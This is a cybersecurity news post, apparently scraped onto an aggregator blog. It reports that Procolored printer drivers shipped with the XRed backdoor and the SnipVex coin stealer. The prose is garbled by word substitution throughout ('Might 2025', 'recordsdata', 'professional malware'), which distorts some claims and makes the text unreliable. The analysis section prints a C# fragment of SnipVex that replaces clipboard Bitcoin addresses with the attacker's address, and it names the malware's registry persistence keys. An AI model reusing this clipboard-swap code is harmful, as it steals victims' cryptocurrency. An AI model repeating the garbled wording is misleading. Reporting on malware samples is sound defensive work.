Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Printer Company Offered Malicious Drivers Infected With XRed Malware

Posted on May 17, 2025May 17, 2025 By CWS

In a regarding cybersecurity incident, printer producer Procolored unknowingly distributed malware-infected software program for roughly six months, ending in Might 2025.

The problem got here to mild when YouTube creator Cameron Coward of the channel Serial Hobbyism tried to assessment a $6,000 UV printer and was alerted by his antivirus software program to infections on the company-provided USB drive.

What initially appeared as potential false positives was subsequently confirmed to be professional malware-a refined mixture of a backdoor and a cryptocurrency-stealing virus.

The contaminated software program packages, accessible for obtain from Procolored’s web site through mega.nz hyperlinks, contained malicious code affecting six printer merchandise: F8, F13, F13 Professional, V6, V11 Professional, and VF13 Professional.

When customers put in the drivers, their methods grew to become contaminated with two distinct malware strains: Win32.Backdoor.XRedRAT.A and MSIL.Trojan-Stealer.CoinStealer.H (known as SnipVex).

The infections affected a complete of 39 recordsdata throughout the assorted software program packages, with 20 distinctive file hashes recognized.

G DATA safety researchers recognized that the XRed backdoor part had beforehand been documented in February 2024, indicating this was not a brand new risk however somewhat an older malware pressure that had discovered its method into Procolored’s provide chain.

Evaluation revealed the backdoor contained the very same command and management URLs as variants analyzed earlier, regardless that these servers had already gone offline earlier than this incident gained consideration.

The affect of those infections prolonged past mere knowledge safety issues. Blockchain evaluation confirmed that the attackers’ Bitcoin tackle acquired roughly 9.3 BTC-equivalent to roughly $100,000-likely from hijacked cryptocurrency transactions.

Regardless of the command and management infrastructure being inactive since February 2024, limiting the backdoor’s performance, the file-infecting capabilities of SnipVex continued to pose vital dangers to affected methods.

An infection Mechanism of SnipVex

The SnipVex part employed a classy file an infection technique, working as a basic prepending virus.

Payload of SnipVex consists solely of eight strains (Supply – G DATA)

When analyzing the PrintExp.exe pattern (SHA256: 531d08606455898408672d88513b8a1ac284fdf1fe011019770801b7b46d5434), researchers discovered that the malware prepended itself to professional executable recordsdata.

The virus’s an infection routine was elegantly easy but efficient. It first checked goal recordsdata for an an infection marker-specifically the byte sequence 0x0A 0x0B 0x0C within the ultimate three bytes-to keep away from superinfection.

An infection routine of SnipVex (Supply – G DATA)

It then selectively averted infecting recordsdata in %TEMP% or %APPDATA% directories, in addition to any recordsdata beginning with a dot.

// SnipVex clipboard monitoring code
// Searches for Bitcoin tackle patterns and replaces them
if (Regex.IsMatch(clipboardText, “[13][a-km-zA-HJ-NP-Z1-9]{25,34}”))
{
Clipboard.SetText(“1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj”);
}

To propagate, SnipVex monitored all logical drives for any adjustments to recordsdata with “.exe” extensions, making a persistent an infection vector throughout linked methods.

The virus established persistence by way of Home windows Registry run keys (HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunScdBcd and HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunClpBtcn), guaranteeing it remained energetic throughout system reboots.

Procolored has since eliminated all contaminated software program from their web site and issued remediation steerage to affected prospects, promising improved safety measures for future software program distributions.

How SOC Groups Save Time and Effort with ANY.RUN – Dwell webinar for SOC groups and managers

Cyber Security News Tags:Company, Drivers, Infected, Malicious, Malware, Offered, Printer, XRed

Post navigation

Previous Post: Guide to Cloud API Security
Next Post: New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads

Related Posts

RapperBot Botnet Attack Peaks 50,000+ Attacks Targeting Network Edge Devices Cyber Security News
How Anat Heilper Orchestrates Breakthroughs In Silicon And Software Cyber Security News
Network Intrusion Detection for Emerging 2025 Cyber Threats Cyber Security News
251 Malicious IPs Attacking Cloud-Based Devices Leveraging 75 Exposure Points Cyber Security News
Europol Dismantles Fraud Crypto Investment Ring That Tricked 5000+ Victims Worldwide Cyber Security News
Google Chrome May Soon Turn Webpages Into Podcasts With AI Audio Overviews Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • NightEagle APT Exploits Microsoft Exchange Flaw to Target China’s Military and Tech Sectors
  • In Other News: Hacker Helps Kill Informants, Crylock Developer Sentenced, Ransomware Negotiator Probed
  • Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks
  • Multiple PHP Vulnerabilities Allow SQL Injection & DoS Attacks
  • Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • NightEagle APT Exploits Microsoft Exchange Flaw to Target China’s Military and Tech Sectors
  • In Other News: Hacker Helps Kill Informants, Crylock Developer Sentenced, Ransomware Negotiator Probed
  • Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks
  • Multiple PHP Vulnerabilities Allow SQL Injection & DoS Attacks
  • Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News